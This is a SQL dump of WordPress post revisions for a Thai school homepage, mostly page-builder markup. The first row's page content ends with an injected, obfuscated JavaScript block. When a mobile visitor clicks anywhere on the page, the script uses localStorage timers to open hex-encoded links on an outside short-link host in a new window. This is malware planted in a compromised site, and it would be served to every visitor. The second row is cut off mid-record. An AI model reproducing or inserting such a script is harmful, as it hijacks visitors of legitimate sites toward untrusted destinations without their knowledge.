(60,1,'2024-07-27 10:57:50','2024-07-27 03:57:50','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":200},\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#0a71ad\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"73adeab7\",\"blockVersion\":4,\"display\":\"block\",\"typography\":{\"textAlign\":\"center\",\"fontSize\":\"20px\"},\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"20px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"20px\",\"marginBottom\":\"10px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#0693e3\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-73adeab7 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"]} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 10:57:50','2024-07-27 03:57:50','',14,'http://pakhaeng.ssk.in.th/?p=60',0,'revision','',0),
(61,1,'2024-07-27 10:58:18','2024-07-27 03:58:18','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\